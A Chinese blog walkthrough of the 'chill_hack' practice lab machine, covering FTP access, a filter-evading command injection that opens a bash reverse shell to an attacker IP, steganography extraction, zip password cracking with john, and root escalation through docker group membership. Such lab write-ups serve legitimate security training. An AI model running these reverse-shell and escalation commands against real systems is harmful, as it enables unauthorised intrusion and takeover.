chill_hack靶机攻略

最新推荐文章于 2024-07-30 20:50:32 发布
最新推荐文章于 2024-07-30 20:50:32 发布
阅读量180 收藏
点赞数
分类专栏: 靶机系列 文章标签: java 数据库 开发语言 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134129976
版权

chill_hack靶机攻略

扫描

image-20231030210321452

image-20231030210331814

渗透

ftp开放,提示ftp连接

连接过后发现一个文本文件

下载下来

ftp 10.4.7.155
ftp
ftp
dir
get note.txt

image-20231030210308826

查看内容

image-20231030210456604

此处可以知道两个用户名,并且提示命令被过滤

bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.132/8888 0>&1'
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.138/12138 0>&1'

提权

使用sudo -l

发现可以以appar身份执行.sh文件

image-20231030214921904

image-20231030215018127

看代码感觉没什么用

在/var/www/files中发现hacker.php

查看源码

两行提示可能有图片隐写

image-20231030215623251

靶机开启pythonweb服务

image-20231030215822449

使用工具

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

发现有个压缩包,但是解压需要密码

zip2john backup.zip > backup.john
# 将名为 backup.zip 的 ZIP 文件的密码哈希提取出来,并将结果保存到名为 backup.john 的文件中

john --wordlist=/usr/share/wordlists/rockyou.txt backup.john

image-20231030220459149

pass1word

image-20231030220544113

查看一下解压出来的东西

发现密文

image-20231030220749247

IWQwbnRLbjB3bVlwQHNzdzByZA==
#base64解码
!d0ntKn0wmYp@ssw0rd

家目录下可以看到有三个用户,挨个尝试ssh登录,发现只有anurodh可以登录

anurodh:!d0ntKn0wmYp@ssw0rd

image-20231030221114757

id发现该用户在docker组内

怀疑在docker里

查看该文件,确认一下是不是在docker里

image-20231030222607471

发现就是在docker里

查看docker镜像

docker images

提权

docker run -it -v /root:/mnt alpine

image-20231030223032891

order libra
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CHill_HACK靶机渗透测试
weixin_49340699的博客
07-23 544
CHill_HACK靶机渗透测试环境工具流程 环境 kali IP 192.168.19.131 靶机 IP 192.168.19.154 工具 netdicover nmap gobuster netcat steghide frackzip base64在线解码 流程 首先使用netdiscover对目标网段进行扫描主机发现 发现目标主机192.168.19.154 nmap对端口扫描信息收集 目标靶机开启了ssh,ftp,http 先从21端口开始收集查看ftp是否存在匿名登录,存在匿名登录,登录
chill_2.11-0.8.4-API文档-中英对照版.zip
04-19
赠送jar包:chill_2.11-0.8.4.jar; 赠送原API文档:chill_2.11-0.8.4-javadoc.jar; 赠送源代码:chill_2.11-0.8.4-sources.jar; 赠送Maven依赖信息文件:chill_2.11-0.8.4.pom; 包含翻译后的API文档:chill_2.11...
vulnhub----CHILL HACK
weixin_50339832的博客
06-09 234
扫描靶机 nmap -A -p- 192.168.241.0/24 masscan -p80 192.168.241.0/24
【Tryhackme】Chill Hack(命令行注入,用户组提权:docker)
顶峰
12-20 149
本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。
Vulnhub-Chill_Hack
路西菲尔的故事汇
08-14 221
[靶场实战]Vulnhub-Chill_Hack Writeup实战思路靶场下载地址https://www.vulnhub.com/entry/chill-hack-1,622/废话不多说 直接开始第一步使用kali扫描内网IPArp-scan –l获得靶场IP为192.168.72.132对靶场进行端口扫描Nmap –A –v 192.168.72.132发现存在21 22 80三个端口21端口存在匿名访问 咱们先访问看看ftp 192.168.72.132用户名使用anonymous 密码为空成功登陆查
vulnhub靶机-CHILL HACK: 1
臭nana的博客
12-21 1009
靶机描述:提示枚举 1、找到靶机ip:192.168.74.135 nmap -sn 192.168.74.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.74.135 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.135 Host is up (0.0044s latency). Not shown: 65532 closed ports PO
chill_2.12-0.9.3-API文档-中文版.zip
07-06
赠送jar包:chill_2.12-0.9.3.jar; 赠送原API文档:chill_2.12-0.9.3-javadoc.jar; 赠送源代码:chill_2.12-0.9.3-sources.jar; 赠送Maven依赖信息文件:chill_2.12-0.9.3.pom; 包含翻译后的API文档:chill_2.12...
chill_2.11-0.7.6-API文档-中文版.zip
06-06
赠送jar包:chill_2.11-0.7.6.jar; 赠送原API文档:chill_2.11-0.7.6-javadoc.jar; 赠送源代码:chill_2.11-0.7.6-sources.jar; 赠送Maven依赖信息文件:chill_2.11-0.7.6.pom; 包含翻译后的API文档:chill_2.11...
chill_2.12-0.9.3-API文档-中英对照版.zip
07-04
赠送jar包:chill_2.12-0.9.3.jar; 赠送原API文档:chill_2.12-0.9.3-javadoc.jar; 赠送源代码:chill_2.12-0.9.3-sources.jar; 赠送Maven依赖信息文件:chill_2.12-0.9.3.pom; 包含翻译后的API文档:chill_2.12...
chill_2.11-0.7.6-API文档-中英对照版.zip
06-05
赠送jar包:chill_2.11-0.7.6.jar; 赠送原API文档:chill_2.11-0.7.6-javadoc.jar; 赠送源代码:chill_2.11-0.7.6-sources.jar; 赠送Maven依赖信息文件:chill_2.11-0.7.6.pom; 包含翻译后的API文档:chill_2.11...
java springboot 集成 阿里通义千问
qq_25987725的博客
07-25 293
一、在阿里云https://www.aliyun.com官网直接搜索“通义千问”,点击“开通DashScope”进行服务激活。四、在config目录添加配置 TongYiAiConfiguration.java。三、在yml中配置中配置key。二、加入Maven依赖。
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
qq_43700885的博客
07-29 327
1.导入hutool的maven依赖。2.复制一下代码执行。
java判断邮箱地址是否正确,使用hutool工具判断邮箱地址是否正确
qq_43700885的博客
07-29 234
1.导入hutool的maven依赖。2.直接复制一下代码运行。
Swagger使用Map接受参数时,页面如何显示具体参数及说
a1058926697的博客
07-26 604
后端使用Map接受参数,要求在swagger页面上显示具体的参数名称、类型及说明。当Map接受参数数量少时,可以使用Swagger自带的注解。自定义注解 @ApiGlobalModel。编写处理注解对应的插件。
花几千上万学习Java,真没必要!(三十五)
最新发布
wehpd的博客
07-30 251
集合之Map
Java的@DateTimeFormat注解与@JsonFormat注解的使用对比
訾博(ZiBo)的博客
07-27 727
在Spring和Jackson框架中,日期和时间格式化是一个常见需求。注解主要用于Spring的表单绑定,而注解则用于Jackson的JSON序列化和反序列化。了解这两个注解的使用场景和方法,可以帮助开发者更高效地处理日期和时间。和是处理日期和时间格式化的两个重要注解。主要用于Spring MVC的请求参数绑定,而主要用于Jackson的JSON序列化和反序列化。了解它们的使用场景和功能,可以帮助开发者更高效地处理日期和时间格式化需求。通过本文的介绍,希望读者能够更清晰地理解和。
Java代码基础算法练习-数的特性-2024.07.25
Sakurapaid的博客
07-25 415
小A喜欢两种性质都成立的数字,小B喜欢至少符合一种性质的数字,小C喜欢不符合这两种性质的 数字。给出一个数字,请输出三个人是否喜欢这个数字。如果喜欢输出1,否则输出0,用空格分隔。输入数字 num,先定义三个整型代表三个人的喜欢与否,先默认设为 0。之后判断num对于性质1、2的条件,分别用 boolen 类型标识。对于每个整型进行判断,是否改为 1 代表喜欢。性质2:大于4且不大于12;
Java修炼 2024.7.26 0:24
2301_80011650的博客
07-26 465
问题:编写一个方法,找出一个数组中的众数(出现次数超过数组长度一半的元素)。例如,输入 [2, 2, 1, 1, 2],输出 2。编写一个方法,找出一个整数数组中的第二大元素。例如,输入 [3, 5, 1, 8, 7],输出 7。例如,输入 5,输出 5。问题:编写一个方法,将给定的字符串逆转。问题:使用数组实现栈,并提供基本操作(push、pop、peek、isEmpty)。问题:实现一个单向链表,并提供基本的操作(添加、删除、查找元素)。问题:编写一个方法来查找一个给定字符串的所有子串。
Java8新特性之FlatMap&Reduce
startqbb的博客
07-26 196
【代码】Java8新特性之FlatMap&Reduce。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值